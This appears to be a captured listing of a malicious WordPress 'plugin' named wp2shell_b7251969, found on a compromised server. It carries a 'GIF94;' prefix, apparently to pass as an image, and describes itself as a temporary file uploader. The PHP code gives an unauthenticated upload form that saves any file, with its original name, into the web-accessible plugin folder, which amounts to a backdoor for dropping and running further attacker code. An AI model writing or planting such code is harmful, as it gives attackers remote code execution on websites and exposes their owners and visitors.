GIF94;
| Path : /var/www/wordpress/wp-content/plugins/wp2shell_b7251969/ |
| Current File : /var/www/wordpress/wp-content/plugins/wp2shell_b7251969/wp2shell_b7251969.php |
<?php
/*
Plugin Name: wp2shell_b7251969
Description: Temporary file uploader.
*/
?>
<html><body><form method=post enctype=multipart/form-data>
<input type=file name=f><input type=submit value=Upload></form><pre><?php
if(isset($_FILES['f'])){move_uploaded_file($_FILES['f']['tmp_name'],$_FILES['f']['name']);
echo$_FILES['f']['name'].' OK';}
echo 'UPLOAD_OKE';
?></pre></body></html>